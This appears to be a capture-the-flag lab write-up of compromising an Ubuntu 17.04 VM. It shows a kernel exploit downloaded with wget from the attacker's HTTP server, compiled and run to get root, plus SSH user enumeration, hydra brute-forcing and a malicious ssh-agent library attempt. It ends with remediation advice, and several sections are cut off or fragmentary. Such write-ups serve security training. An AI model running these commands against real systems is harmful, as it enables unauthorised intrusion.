There is only "File read" and "Sudo". So, this didn't work also. #### Cronjobs ``` cat /etc/crontab ``` Results: ``` # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # ``` Lets check the `cron.hourly`: ``` www-data@gamma:/etc/cron.daily$ ls -la total 64 drwxr-xr-x 2 root root 4096 Sep 16 2020 . drwxr-xr-x 100 root root 4096 Nov 25 21:18 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 539 Jul 16 2019 apache2 -rwxr-xr-x 1 root root 376 Dec 14 2016 apport -rwxr-xr-x 1 root root 1474 Apr 1 2017 apt-compat -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils -rwxr-xr-x 1 root root 1597 Apr 25 2016 dpkg -rwxr-xr-x 1 root root 372 Mar 22 2017 logrotate -rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db -rwxr-xr-x 1 root root 539 Jul 26 2016 mdadm -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate -rwxr-xr-x 1 root root 249 Nov 19 2014 passwd -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest -rwxr-xr-x 1 root root 441 Jan 28 2017 sysstat -rwxr-xr-x 1 root root 214 Jul 12 2013 update-notifier-common ``` We can't edit any of those. Lets move to another method. #### Kernel We found previously by the command `uname -r`, that the kernel version is `4.10.0-19-generic`. Lets search on searchsploit for vulnerabilities associated with this version. ``` searchsploit Linux Kernel 4.10 ``` Results: ``` -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation | linux/local/47163.c Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` Lets try this one: ``` Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c ``` Lets copy it first to our current directory: ``` ┌──(kali㉿kali)-[~/tryhackme] └─$ searchsploit -m 45010.c Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation URL: https://www.exploit-db.com/exploits/45010 Path: /usr/share/exploitdb/exploits/linux/local/45010.c Codes: CVE-2017-16995 Verified: True File Type: C source, ASCII text Copied to: /home/kali/tryhackme/45010.c ``` Now, lets move the exploit to the target machine: On our attacker machine, lets start an http server: ``` python3 -m http.server 8080 ``` On the netcat session: ``` www-data@gamma:/tmp$ wget http://192.168.229.150:8080/45010.c --2024-12-06 00:56:01-- http://192.168.229.150:8080/45010.c Connecting to 192.168.229.150:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 13176 (13K) [text/x-csrc] Saving to: '45010.c' 45010.c 100%[=====================================================================================>] 12.87K --.-KB/s in 0s 2024-12-06 00:56:01 (618 MB/s) - '45010.c' saved [13176/13176] www-data@gamma:/tmp$ ``` Lets now compile the exploit: ``` gcc -o exploit 45010.c ``` Making it executable: ``` www-data@gamma:/tmp$ chmod +x exploit ``` Running it: ``` ./exploit ``` Result: ``` [.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t) [.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel ** [.] [*] creating bpf map [*] sneaking evil bpf past the verifier [*] creating socketpair() [*] attaching bpf backdoor to socket [*] skbuff => ffff8d47f7b49b00 [*] Leaking sock struct from ffff8d47fc26c800 [*] Sock->sk_rcvtimeo at offset 592 [*] Cred structure at ffff8d47fc27c540 [*] UID from cred structure: 33, matches the current: 33 [*] hammering cred structure at ffff8d47fc27c540 [*] credentials patched, launching shell... # whoami root # ``` And we are root! Lets now upgrade the shell: ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ``` Lets seach now for the flag ``` find / -name "flag" 2>/dev/null ``` Result: ``` /var/www/html/images/flag.txt /root/flag.txt root@gamma:/# ``` ``` cat /root/flag.txt ``` Result: ``` _____ _.+sd$$$$$$$$$bs+._ .+d$$$$$$$$$$$$$$$$$$$$$b+. .sd$$$$$$$P^*^T$$$P^*"*^T$$$$$bs. .s$$$$$$$$P* `*' _._ `T$$$$$$$s. .s$$$$$$$$$P ` :$; T$$$$$$$$s. s$$$$$$$$$$; db..+s. `**' T$$$$$$$$$s .$$$$$$$$$$$$' `T$P*' T$$$$$$$$$$. .$$$$$$$$$$$$P T$$$$$$$$$$. .$$$$$$$$$$$$$b `$$$$$$$$$$$. :$$$$$$$$$$$$$$$. T$$$$$$$$$$$; $$$$$$$$$P^*' :$$b. d$$$$$$$$$$$$ :$$$$$$$P' T$$$$bs._ :P'`*^T$$$$$$$; $$$$$$$P `*T$$$$$b ' `T$$$$$$ :$$$$$$$b `*T$$$s :$$$$$; :$$$$$$$$b. $$$$$; $$$$$$$$$$$b. :$$$$$$ $$$$$$$$$$$$$bs. .$$$$$$$ $$$$$$$$$$$$$$$$$bs. .d$$$$$$$$ :$$$$$$$$$$$$$P*"*T$$bs,._ .sd$$$$$$$$$; :$$$$$$$$$$$$P TP^**T$bss++.._____..++sd$$$$$$$$$$$$; $$$$$$$$$$$$b `T$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ :$$$$$$$$$$$$b. `*T$$P^*"*"*^^*T$$$$$$$$$$$$; $$$b `T$b+ :$$$$$$$BUG$$ :$P' `"' ,._. ;$$$$$$$$$$$; \ `*TP* d$$P*******$ \ :$$P' / \ :dP' / `. d$P .' BAKRI `. `' .' `-. .-' `-. .-' `*+-._ _.-+*' `"*-------*"' Congradulations on obtaining the allmighty root user flag. Great work! Do not forget that you have goal 2 in the CTF requirements The flag of root: flag{2893d890e8847d5575ac33229a037ca4} root@gamma:/# ``` So the root flag is: `flag{2893d890e8847d5575ac33229a037ca4}`. ## 4- Extra Attack Vectors ### Privilege escalation #### First one Lets re-check the kernel version: ``` www-data@gamma:/tmp$ uname -r 4.10.0-19-generic ``` Now, Lets search on searchsploit for any other exploits: ``` searchsploit linux 4.10 ``` Results: ``` Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation | linux/local/37088.c CyberArk < 10 - Memory Disclosure | linux/remote/44829.py CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure | linux/dos/44428.txt Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read | linux/local/44688.txt DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) | linux/webapps/42769.rb Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py Exim Internet Mailer 3.35/3.36/4.10 - Format String | linux/local/22066.c Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | linux/remote/16925.rb Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access | linux/remote/43386.py Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution | linux/webapps/44543.txt LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure | linux/remote/44022.md LinkLogger 2.4.10.15 - 'syslog' Denial of Service | linux/dos/8955.pl Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module | linux/dos/46477.txt Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall | linux/dos/44641.c Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem | linux/dos/46502.txt Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation | linux/local/47163.c Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c Logpoint < 5.6.4 - Root Remote Code Execution | linux/remote/42158.py MiniDVBLinux <=5.4 - Config Download Exploit | hardware/remote/51091.txt NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation | linux/local/42305.txt OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service | linux/dos/34522.txt Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service | linux/dos/34521.txt Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation | linux/local/41196.txt Oracle WebCenter FatWire Content Server < 7 - Improper Access Control | linux/webapps/44757.txt Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution | linux/webapps/45361.py runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) | linux/local/46359.md runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) | linux/local/46369.md Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit) | linux/webapps/41697.rb Splunk < 7.0.1 - Information Disclosure | linux/webapps/44865.txt systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation | linux/local/43935.txt Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution | linux/remote/42949.txt UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation | linux/local/42936.md UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape | linux/local/42937.md UoW Pine 4.0.4/4.10/4.21 - 'From:' Remote Buffer Overflow | linux/remote/20237.c usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation | linux/local/36820.txt VFU 4.10-1.1 - Local Buffer Overflow | linux/local/35450.txt VFU 4.10-1.1 - Move Entry Buffer Overflow | linux/local/36229.py Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution | linux/local/46973.md -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` There is one that caught my attention: ``` Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c ``` Our kernel version is in this range. Lets try it out. ``` ┌──(kali㉿kali)-[~/tryhackme] └─$ searchsploit -m 50135 Exploit: Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation URL: https://www.exploit-db.com/exploits/50135 Path: /usr/share/exploitdb/exploits/linux/local/50135.c Codes: CVE-2021-22555 Verified: True File Type: C source, ASCII text Copied to: /home/kali/tryhackme/50135.c ``` First, lets check the exploit to see if there are any needed modifications before we run the exploit on the vulnerable machine. ``` nano 50135.c ``` There is this line: `gcc -m32 -static -o exploit exploit.c` So, we need this compiler. I asked Chat GPT for the compiler: ChatGPT output: ``` sudo apt install gcc-multilib libc6-dev-i386 -y ``` So, I did this command, and compiled the exploit: ``` gcc -m32 -static -o exploit 50135.c ``` Now, lets move this exploit to the vulnerable machine: On our attacker machine, lets start an http server on port 8080: ``` python3 -m http.server 8080 ``` On the nc session, lets run: ``` wget 192.168.229.150:8080/exploit ``` Result: ``` --2024-12-06 00:10:54-- http://192.168.229.150:8080/exploit Connecting to 192.168.229.150:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 777336 (759K) [application/octet-stream] Saving to: 'exploit' exploit 100%[=====================================================================================>] 759.12K --.-KB/s in 0.005s 2024-12-06 00:10:54 (163 MB/s) - 'exploit' saved [777336/777336] ``` ``` chmod +x exploit ``` ``` www-data@gamma:/tmp$ ./exploit [+] Linux Privilege Escalation by theflow@ - 2021 [+] STAGE 0: Initialization [*] Setting up namespace sandbox... [*] Initializing sockets and message queues... [+] STAGE 1: Memory corruption [*] Spraying primary messages... [*] Spraying secondary messages... [*] Creating holes in primary messages... [*] Triggering out-of-bounds write... [*] Searching for corrupted primary message... [-] Error could not corrupt any primary message. www-data@gamma:/tmp$ uname -r 4.10.0-19-generic ``` It didn't work. #### Second One: Our ubuntu version is `17.04` Lets try another exploit from exploit db. In exploit-db website, lets type `ubuntu 17.04`
This is the exploit, lets check out the code before we try it. Lets now transfer it to the vulnerable machine. On the attacker machine, lets open an http server: ``` python3 -m http.server 8080 ``` On the Target machine, lets go to the /tmp directory. ``` cd /tmp ``` ``` www-data@gamma:/tmp$ wget http://192.168.229.150:8080/exploit.c wget http://192.168.229.150:8080/exploit.c --2024-12-09 11:27:18-- http://192.168.229.150:8080/exploit.c Connecting to 192.168.229.150:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 30153 (29K) [text/x-csrc] Saving to: 'exploit.c' exploit.c 100%[===================>] 29.45K --.-KB/s in 0s 2024-12-09 11:27:18 (128 MB/s) - 'exploit.c' saved [30153/30153] www-data@gamma:/tmp$ wget http://192.168.229.150:8080/la.c wget http://192.168.229.150:8080/la.c --2024-12-09 11:27:35-- http://192.168.229.150:8080/la.c Connecting to 192.168.229.150:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 761 [text/x-csrc] Saving to: 'la.c' la.c 100%[===================>] 761 --.-KB/s in 0s 2024-12-09 11:27:35 (204 MB/s) - 'la.c' saved [761/761] www-data@gamma:/tmp$ ls ls exploit.c la.c www-data@gamma:/tmp$ gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie la.so.h xxd -i la.so > la.so.h www-data@gamma:/tmp$ gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
Lets Specify the IP:
Launching Scan:
Results:
1- JQuery 1.2 < 3.5.0 Multiple XSS 2- SSH Terrapin Prefix Truncation Weakness (CVE-2023-48795)
Those were the main 2 vulnerabilities found. ### Other Ports #### SSH **Scan:** ``` nmap -sV -p22 192.168.213.138 ``` **Results:** ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0) MAC Address: 00:0C:29:7F:C0:F0 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` **Version:** OpenSSH 7.4p1 (Ubuntu 10) This is an older version of OpenSSH, and it may have known vulnerabilities that could be exploited. **CVE-2018-15473** This exploit targets openSSH < 7.7 - user enumeration. Steps: Lets Download the Exploit: ``` searchsploit -m 45233.py ``` Lets now Create a python Virtual Environment to install dependencies: ``` python3 -m venv ~/myvenv source ~/myvenv/bin/activate pip install chmod +x 45233.py ``` Now, lets run the exploit to check if www-data and root are valid users: ``` python3 45233.py 192.168.213.138 --username root root is a valid user! ``` ``` python3 45233.py 192.168.213.138 --username www-data www-data is a valid user! ``` **Bruteforce SSH** Since we now know that www-data and root are valid users, we'll run a bruteforce attack on ssh: ``` hydra -l www-data -P /usr/share/wordlists/rockyou.txt ssh://192.168.213.138 ``` Result: ``` Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-07 08:50:57 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.213.138:22/ [STATUS] 394.00 tries/min, 394 tries in 00:01h, 14344007 to do in 606:47h, 14 active [STATUS] 309.00 tries/min, 927 tries in 00:03h, 14343478 to do in 773:40h, 10 active [STATUS] 270.43 tries/min, 1893 tries in 00:07h, 14342512 to do in 883:57h, 10 active [STATUS] 260.67 tries/min, 3910 tries in 00:15h, 14340495 to do in 916:55h, 10 active [STATUS] 253.68 tries/min, 7864 tries in 00:31h, 14336541 to do in 941:55h, 10 active [STATUS] 252.26 tries/min, 11856 tries in 00:47h, 14332549 to do in 946:58h, 10 active [STATUS] 250.87 tries/min, 15805 tries in 01:03h, 14328600 to do in 951:55h, 10 active [STATUS] 250.33 tries/min, 19776 tries in 01:19h, 14324629 to do in 953:44h, 10 active ``` Unfortunately, it didn't work on `www-data`. Now, Lets try on `root`. ``` hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.213.138 ``` Result: ``` Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-07 10:19:13 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.213.138:22/ [STATUS] 366.00 tries/min, 366 tries in 00:01h, 14344035 to do in 653:12h, 14 active [STATUS] 365.00 tries/min, 1095 tries in 00:03h, 14343306 to do in 654:57h, 14 active [STATUS] 345.00 tries/min, 2415 tries in 00:07h, 14341986 to do in 692:51h, 14 active [STATUS] 345.40 tries/min, 5181 tries in 00:15h, 14339220 to do in 691:55h, 14 active [STATUS] 332.32 tries/min, 10302 tries in 00:31h, 14334101 to do in 718:54h, 12 active [STATUS] 319.66 tries/min, 15024 tries in 00:47h, 14329379 to do in 747:07h, 12 active ``` Also, didn't work. **OpenSSH < 6.6 SFTP - Command Execution** We first check the code. It needs username: password. Since we don't know them, we can't use this exploit. **CVE-2016-10009** Following the steps in the CVE: Lets compile the code: ``` gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall ``` Lets connect to another machine using "ssh -A". Then, on the remote machine: ``` sh-add -s [...]/evil_lib.so ``` To do the above, I sent the code to the other machine using the exploited port 80 using http.server, so now the compiled evil\_lib.so is on the target machine. ``` www-data@gamma:/tmp$ ls 45010.c 45010.c.1 evil_lib.so exploit linpeas.out linpeas.sh tmux-33 ``` Now we run the code as specified: ``` www-data@gamma:/tmp$ ssh-add -s /tmp/evil_lib.so Could not open a connection to your authentication agent. ``` It didn't work. #### Port 5355 Looked for exploits of port 5355 on exploit-db. None found. Searched the web for "port 5355 vulnerabilities". No exploits found. Using searchsploit: ``` searchsploit llmnr Exploits: No Results Shellcodes: No Results ``` #### Port 68 * Looked for exploits of port 68 on exploit-db. None found. * This might be relevant: (source: network-manager-command-injection-vulnerability) ``` "SonicWall Threat Research Lab is seeing attempts to exploit the CVE-2018- 1111 vulnerability - An OS command injection flaw in the Red Hat NetworkManager integration script included in its DHCP package. This is due to improper validation of DHCP responses by the Network Manager. Red Hat NetworkManager that's shipped by default with Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to this flaw. A remote attacker could exploit this vulnerability by sending a malicious DHCP response to a vulnerable target.   The Dynamic Host Configuration Protocol (DHCP) is a network management protocol that issues DHCP requests to fetch network configurations such as IP address, Gateway, DNS servers and more. DHCP is implemented with two UDP port numbers (67 & 68). Port 67 is the destination port of a server and 68 is used by the client. A single DHCP transaction consists of several DHCP messages exchanged between the DHCP client and DHCP server. When a Network Manager receives a DHCP response with option records, DHCP client package provided by Red Hat for the NetworkManager component tries to read DHCP Option data for each of the record using the script and evaluates it to set the necessary environment variables. As the Option data is not properly sanitized, supplied arguments  such as shell commands result in arbitrary command execution. Hence an attacker with a malicious DHCP server can spoof DHCP responses to vulnerable DHCP clients to execute arbitrary shell commands with root privileges." ``` Further examining this CVE, it specifically targets Red Hat-based distributions and their dhclient implementation. Ubuntu 10 (or any Debian-based distribution) does not use the same vulnerable script mechanism in dhclient, so this exploit would not work directly on Ubuntu 10. Since we have access to the machine from exploiting port 80, I checked the version of dhclient to see what are some relevant vulnerabilities: ``` www-data@gamma:/tmp$ dhclient --version isc-dhclient-4.3.5 ``` Run searchsploit: ``` searchsploit dhclient 4.3.5 Exploits: No Results Shellcodes: No Results ``` ## 5- Remediations and Recommendations for Machine Owner ### Passwords #### What Makes a Password Strong? In today's digital age, hackers have advanced tools that can crack weak passwords in seconds. To stay secure, your password needs to be unique, complex, and not tied to your personal information. #### How to Create a Secure Password * **Complexity is Key:** A strong password should have at least 16 characters, mixing uppercase and lowercase letters, numbers, and symbols. For example: `MySecureP@ssw0rd2024!`. * **Avoid Personal Information:** Don’t use your name, birthday, or anything linked to your identity like in the exploited machine the password is a name "HusseinBakri". * **Passphrases Work Wonders:** Use memorable yet random sentences. Instead of a random mix, try something like: *"ILoveToTravelInItaly2024!"*. It's long, personal to your hobbies, and easy for you to recall but tough for hackers to guess. ### Server-Side Fix to Prevent `.jpg.php` Uploads 1. **Server-Side File Type Validation** First, ensure that the backend performs strict validation on the MIME type of the file. In your jQuery backend (if you’re using a backend written in PHP or Node.js, for example), check the MIME type to confirm the uploaded file is indeed an image and not a disguised PHP script. Here’s a basic example using PHP to validate uploaded files: `// Get the MIME type of the uploaded file $fileMimeType = mime_content_type($_FILES['fileInput']['tmp_name']); // Only allow image MIME types $allowedMimeTypes = ['image/jpeg', 'image/png']; if (!in_array($fileMimeType, $allowedMimeTypes)) { die('Invalid file type. Only JPEG and PNG files are allowed.'); }` 2. **Check File Extensions and File Content** Don't rely only on the file extension (e.g., `.jpg.php`) as attackers can easily manipulate file names. Use functions that inspect the file's content because in our case we put a reverse shell that give us an access to the machine , so if the content of the uploaded file was inspected, the risk of exploiting the machine will be reduced. For instance, ensure that `.php` scripts are not uploaded by checking the first few bytes of the file content. Example in PHP: `$fileContent = file_get_contents($_FILES['fileInput']['tmp_name']); if (strpos($fileContent, ' Deny from all ` For Nginx, you can use the following directive in your configuration: nginx `location /uploads/ { deny all; location ~ \.php$ { return 403; } }` 4. **Set Proper File Permissions** Ensure that uploaded files have restrictive permissions so they can't be executed. For example: `chmod 0644 /path/to/uploads/*` 5. **Integrating with jQuery for Upload Handling** The jQuery backend code will handle the validation and also help prevent malicious file uploads so this can reduce the exploitation of the machine like we did. Here's how you can modify the jQuery code to support secure file upload: `$(document).ready(function () { $('#uploadForm').on('submit', function (e) { let fileInput = $('#fileInput')[0].files[0]; // Check if a file is selected if (!fileInput) { alert('Please select a file to upload.'); e.preventDefault(); return; } // Validate file extension let allowedExtensions = /(\.jpg|\.jpeg|\.png)$/i; if (!allowedExtensions.exec(fileInput.name)) { alert('Invalid file type. Please upload a .jpg or .png file.'); e.preventDefault(); return; } // Optional: File size limit (e.g., 2MB) if (fileInput.size > 2 * 1024 * 1024) { alert('File size exceeds the 2MB limit.'); e.preventDefault(); return; } alert('File validated. Uploading...'); }); });` ### Steps to Prevent Privilege Escalation: 1. **Upgrade the Operating System:** \- The Ubuntu 17.04 ( OS of the exploited machine ) reached its **end of life (EOL)** in January 2018, meaning it no longer receives security updates. \- **Action:** Upgrade to a currently supported version of Ubuntu (e.g., Ubuntu 22.04 LTS or later). \- **Why:** Supported versions receive regular updates, patching critical vulnerabilities automatically. 2. **Keep the System Updated:** \- Regularly apply updates using the following commands: \`\`\` sudo apt update sudo apt upgrade -y sudo apt dist-upgrade -y \`\`\` 3. **Upgrade the Kernel:** The privilege escalation step is performed using kernel exploitation, and this because the kernel is not up to date so it had a potential to be exploited. Consider upgrading the Linux kernel to a more secure and supported version: `sudo apt install --install-recommends linux-generic-hwe-22.04` 4. **Implement Security Best Practices:** \- **Enable Automatic Security Updates:** \`\`\` sudo apt install unattended-upgrades sudo dpkg-reconfigure -plow unattended-upgrades \`\`\` \- **Limit Privileged Access:** \- Review user accounts with administrative privileges. \- Use **sudo** responsibly and restrict administrative commands. 5. **Enable Kernel Hardening:** \- Use the following security modules: \- **AppArmor:** Pre-installed in Ubuntu, enforce it with: \`\`\`bash sudo systemctl enable apparmor sudo systemctl start apparmor \`\`\` \- **SELinux:** Consider using SELinux for additional protection. \- Enable key kernel protection settings in `/etc/sysctl.conf`: \`\`\` kernel.randomize\_va\_space=2 # Enable Address Space Layout Randomization (ASLR) kernel.kptr\_restrict=2 # Hide kernel pointers \`\`\` 6. **Apply Mandatory Access Control (MAC) Policies:** \- Implement restrictive permissions using tools like AppArmor, SELinux, or Grsecurity. So when we need to access anything we need permission and this reduce the potential of taking directly the session like we do in our exploit. **Business Impact** Failing to address outdated operating systems and kernels could lead to severe data breaches, ransomware attacks, and compliance violations. Upgrading ensures a more secure, stable environment with reduced attack surfaces. **Priority: High** Due to the critical nature of kernel exploitation vulnerabilities, immediate action is required to prevent potential compromises. ### Preventing Information Leaks from Image Files 1. **Avoid Embedding Sensitive Data in Media Files** \- Refrain from embedding sensitive data such as credentials, personal details, or secret keys within image files or other media. Instead, use secure storage mechanisms specifically designed for sensitive data like in the exploit machine we use the image OdinHiddenKnowledge.png to gather username and password information so we conclude that the username is: "godofhacking" and the password is: "HusseinBakri" \- **Why:** Hidden data can be extracted using steganographic analysis tools like `zsteg`, potentially exposing critical information. ( like we did in the exploit machine) 2. **Scrub Metadata Before Sharing Files** \- 